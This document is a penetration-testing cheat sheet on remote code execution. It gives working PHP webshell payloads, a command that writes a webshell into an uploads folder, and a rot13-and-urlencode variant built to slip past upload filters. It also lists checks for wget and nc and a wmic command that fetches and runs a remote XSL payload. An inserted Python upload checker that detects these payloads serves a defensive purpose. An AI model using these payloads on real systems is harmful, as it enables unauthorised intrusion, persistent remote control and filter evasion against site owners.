Remote Code Execution
RCE
PHP RCE
- Test a form for vulnerability to PHP RCE:
<?php phpinfo(); ?>
- Get a remote PHP shell:
<?php system($_GET["c"]); ?>
<?php `$_GET["c"]`; ?>
- Upload a file:
<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>
- Evade upload filters that inspect file contents using rot13 + urlencode (the literal `<?php system(` never appears in the uploaded bytes; it is decoded only when the file is written):
<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/testfile.php', str_rot13(urldecode($payload))); ?>
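As an added defensive example (not part of this cheat sheet), a Python upload check that peels the url-encoding and rot13 layers used in the filter-evasion payload above and flags PHP shells before they reach the web root. The extension allowlist, the pattern list and the `upload_allowed` helper are assumptions for illustration:

```python
import codecs
import re
import urllib.parse

# Constructed detection patterns: a PHP open tag plus one of the execution
# sinks (or the backtick operator on request input) that webshells use.
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval"
    r"|file_put_contents|phpinfo)\s*\(",
    re.IGNORECASE,
)
BACKTICK_EXEC = re.compile(r"`[^`]*\$_(GET|POST|REQUEST)")

# Assumed allowlist for an image/document upload endpoint.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}


def decode_layers(text: str, max_depth: int = 4) -> list[str]:
    """Return the input plus every distinct variant reachable by applying
    urldecode and rot13 up to max_depth times, in any order, so a payload
    hidden behind those layers is inspected in its decoded form."""
    seen = {text}
    frontier = [text]
    for _ in range(max_depth):
        nxt = []
        for s in frontier:
            for variant in (urllib.parse.unquote(s), codecs.decode(s, "rot_13")):
                if variant not in seen:
                    seen.add(variant)
                    nxt.append(variant)
        frontier = nxt
    return list(seen)


def looks_like_php_shell(content: bytes) -> bool:
    """True if any decoded variant contains a PHP tag and an execution sink."""
    text = content.decode("latin-1")  # lossless byte-to-str mapping
    for variant in decode_layers(text):
        if PHP_TAG.search(variant) and (
            DANGEROUS_CALLS.search(variant) or BACKTICK_EXEC.search(variant)
        ):
            return True
    return False


def upload_allowed(filename: str, content: bytes) -> bool:
    """Reject disallowed extensions first, then inspect the content itself."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return not looks_like_php_shell(content)
```

Content inspection complements, rather than replaces, storing uploads outside the web root and serving them without script execution.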
RCE via webshell
- Pentest Monkey has an excellent page of reverse shells in many languages: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- See if the target machine has handy utilities:
which wget
which nc
RCE via WMIC
Running PowerShell on a target without PowerShell installed:
- Generate the payload with web_delivery
- Encode the payload
- Include the payload in an XSL file and load it through wmic:
wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"